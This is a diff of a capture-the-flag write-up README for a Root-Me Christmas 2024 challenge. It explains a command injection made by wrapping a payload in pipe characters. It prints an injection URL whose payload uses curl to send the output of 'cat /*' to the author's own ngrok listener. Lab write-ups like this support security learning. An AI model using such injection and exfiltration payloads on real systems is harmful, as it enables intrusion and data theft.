Ax8457/WriteUPs/Xmas_RootMe_2024/SantaSweetWords/README.md

 <p align="center"><img src="Screenshots/S2.png" alt="Desc"></p>

-Actually it was caused by the append of .txt at the end of the payload.
+<p align="justify">Actually it was caused by the append of .txt at the end of the payload.
 After a few tries, I  finally came up with the exploit below consisting in putting the paylaod between 2 pipe char : | payload |.
-Hence what I've done had been to open a listening port on my machine, and then sent the content of the flag to my server with the request below :
+Hence what I've done had been to open a listening port on my machine, and then sent the content of the flag to my server with the request below :</p>

 ````bash
 https://day18.challenges.xmas.root-me.org/api/message?number=|curl http://ngrokFQDN:port/($cat /*)|